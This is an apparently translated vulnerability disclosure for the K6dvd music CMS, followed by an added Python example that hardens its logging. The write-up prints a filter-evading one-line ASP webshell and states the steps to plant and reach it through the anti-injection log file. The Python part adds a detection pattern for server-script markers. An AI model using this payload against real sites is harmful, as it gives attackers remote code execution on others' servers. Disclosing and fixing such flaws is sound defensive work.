K6dvd music network program: webshell-writing 0day and fix

Source: Internet
Author: User
Tags: servervariables

Koohik

K6dvd is a well-known music publishing management system in China!

If you submit a URL whose parameter carries a quote, the response is as follows:

Illegal operation! The system makes the following records:
Operation IP: xxx.xx
Operation Time: 19:33:47
Operation page: /yxplay.asp
Submission method: GET
Submit parameter: id
Submit data: 109446'

Well, an anti-injection system! Most people who do penetration testing will have seen it ~

Oh, and it also records my IP ~~

I tried a few common penetration ideas at random ~ none of them were satisfactory, because the anti-injection system blocked them!

So I simply downloaded the source code of the music program to see whether I could dig up a 0day ~ and that is how this article came about!!

Let's take a look at the anti-injection system. It lives in conn.asp and sql.asp, and the relevant section is shown below:

ASP/Visual Basic Code
Dim dbkillSql, killSqlconn, connkillSql
'The "database" that receives the log records is an .asp file under the web root
dbkillSql = "data/#sql.asp"
'On Error Resume Next
Set killSqlconn = Server.CreateObject("ADODB.Connection")
connkillSql = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" & Server.MapPath(dbkillSql)
killSqlconn.Open connkillSql

A database connection is created! Then comes the POST check:

ASP/Visual Basic Code
'--- POST section ------
'Fy_Inf is the keyword list Fy_In split on "|" (defined elsewhere in sql.asp)
If Request.Form <> "" Then
For Each Fy_Post In Request.Form
For Fy_Xh = 0 To Ubound(Fy_Inf)
If Instr(LCase(Request.Form(Fy_Post)), Fy_Inf(Fy_Xh)) <> 0 Then
If WriteSql = True Then
'The blocked submission is written, almost verbatim, into the log database opened above
killSqlconn.Execute("insert into 9j455 (Sqlin_IP, SqlIn_Web, SqlIn_FS, SqlIn_CS, SqlIn_SJ) values ('" & Request.ServerVariables("REMOTE_ADDR") & "','" & Request.ServerVariables("URL") & "','post','" & Fy_Post & "','" & replace(Request.Form(Fy_Post), "'", "''") & "')")
killSqlconn.Close
Set killSqlconn = Nothing
End If
Response.Write "<Script Language=JavaScript>alert('Please do not submit any illegal characters or parameter injection to this site!');</Script>"
Response.Write "Invalid operation! The system has made the following records<br>"
Response.Write "Operation IP: " & Request.ServerVariables("REMOTE_ADDR") & "<br>"
Response.Write "Operation Time: " & Now & "<br>"
Response.Write "Operation page: " & Request.ServerVariables("URL") & "<br>"
Response.Write "Submission method: POST<br>"
Response.Write "Submit parameter: " & Fy_Post & "<br>"
Response.Write "Submit data: " & Request.Form(Fy_Post)
Response.End
End If
Next
Next
End If


Well, that is the alert error message!

Take a closer look and you find an interesting fellow.

ASP/Visual Basic Code
killSqlconn.Execute("insert into 9j455 (Sqlin_IP, SqlIn_Web, SqlIn_FS, SqlIn_CS, SqlIn_SJ) values ('" & Request.ServerVariables("REMOTE_ADDR") & "','" & Request.ServerVariables("URL") & "','post','" & Fy_Post & "','" & replace(Request.Form(Fy_Post), "'", "''") & "')")


This is an ordinary record of the IP and the action type, together with the content the injector submitted!!

Now recall that the "database" opened by Server.CreateObject("ADODB.Connection") above is actually an .asp file... So if we submit '<%execute(request("wooden"))%>, wouldn't that write a one-sentence Trojan into #sql.asp for us? Don't be too happy. Let's look again:

'Custom string to be filtered, separated by '|'
Fy_In = "'|;|and|exec|insert|select|delete|update|count|*|%|chr|mid|master|truncate|char|declare"

Every submitted value is checked against the keywords in Fy_In! If any of these keywords appears in the submitted content, the request is stopped right there, so the payload above never reaches the database!

For anyone who has studied a bit of scripting this is no obstacle; after changing it over and over again,

finally a Trojan that slips past all of the detection statements above is born ~ it is simply the pleasure of eval: no execute, and no error!

<script runat=server language=vbscript>eval request(chr(35))</script>

Exploitation method: and => <script runat=server language=vbscript>eval request(chr(35))</script>

Then access data/%23sql.asp to run the one-sentence Trojan.
www.2cto.com solution: enhanced filtering.
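The root problem on this page is not the keyword list but the logging path: blocked input is stored, nearly verbatim, in a file the ASP engine will execute, and the INSERT is built by string concatenation. As an added example (not code from the article or from the K6dvd program), here is a Python model of a hardened version of that path, with sqlite3 standing in for the Access/Jet file. Table and column names are taken from the article; the sample IP, page and inputs are constructed, and the two script-bearing inputs are the ones quoted on this page. The stored copy is encoded so that "<%", "%>" and runat=server tags can never be reassembled from it, the parameters are bound instead of concatenated, and a scanner finds rows written before the fix:

```python
"""Hardened model of the anti-injection log in sql.asp (added example)."""
import html
import re
import sqlite3
from typing import Dict, List, Tuple

# Markers that turn stored text into code when the holding file is processed
# by the ASP engine (the article's log database is data/#sql.asp).
SERVER_SCRIPT = re.compile(
    r"<%|%>|<script[^>]*\brunat\s*=\s*[\"']?server", re.IGNORECASE)


def contains_server_script(value: str) -> bool:
    """True if value carries an ASP delimiter or a runat=server script tag."""
    return SERVER_SCRIPT.search(value) is not None


def neutralize_for_log(value: str) -> str:
    """Encode a submitted value before it is written to the log.

    html.escape turns < > & " ' into entities; '%' is encoded too so the
    '<%' and '%>' delimiters cannot be reassembled from the stored text.
    """
    return html.escape(value, quote=True).replace("%", "&#37;")


def open_log() -> sqlite3.Connection:
    """In-memory stand-in for the 9j455 table of the article's Access file."""
    conn = sqlite3.connect(":memory:")
    conn.execute('CREATE TABLE "9j455" (Sqlin_IP TEXT, SqlIn_Web TEXT, '
                 'SqlIn_FS TEXT, SqlIn_CS TEXT, SqlIn_SJ TEXT)')
    return conn


def record_attempt(conn, ip, page, method, param, data) -> None:
    """Log a blocked request with bound parameters instead of concatenation."""
    conn.execute('INSERT INTO "9j455" (Sqlin_IP, SqlIn_Web, SqlIn_FS, SqlIn_CS, '
                 'SqlIn_SJ) VALUES (?, ?, ?, ?, ?)',
                 (ip, page, method, param, neutralize_for_log(data)))
    conn.commit()


def find_suspicious(conn) -> List[Tuple[int, str]]:
    """Return (rowid, data) for stored rows that still carry script markers."""
    return [(rowid, data)
            for rowid, data in conn.execute('SELECT rowid, SqlIn_SJ FROM "9j455"')
            if contains_server_script(data)]


def demo() -> Dict[str, object]:
    """Run a plain quote and the two inputs quoted in the article through both paths."""
    samples = [  # constructed: the submissions shown on this page
        "109446'",
        "'<%execute(request(\"wooden\"))%>",
        "<script runat=server language=vbscript>eval request(chr(35))</script>",
    ]
    conn = open_log()
    for s in samples:  # hardened path: encoded before storage
        record_attempt(conn, "203.0.113.5", "/yxplay.asp", "GET", "id", s)
    # one legacy row written the old way (raw), so the scanner has something to find
    conn.execute('INSERT INTO "9j455" VALUES (?, ?, ?, ?, ?)',
                 ("203.0.113.5", "/yxplay.asp", "GET", "id", samples[2]))
    return {
        "raw_flagged": [contains_server_script(s) for s in samples],
        "stored_flagged": [contains_server_script(neutralize_for_log(s)) for s in samples],
        "legacy_hits": len(find_suspicious(conn)),
    }


if __name__ == "__main__":
    print(demo())
```

Encoding the stored copy keeps the log useful for review while removing the property the article exploits, and it holds no matter how the keyword list is tuned. The stronger fix is structural: keep the log database outside the web root, or at least in a file extension the script engine never executes, so that whatever an attacker manages to get logged is data and nothing more.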
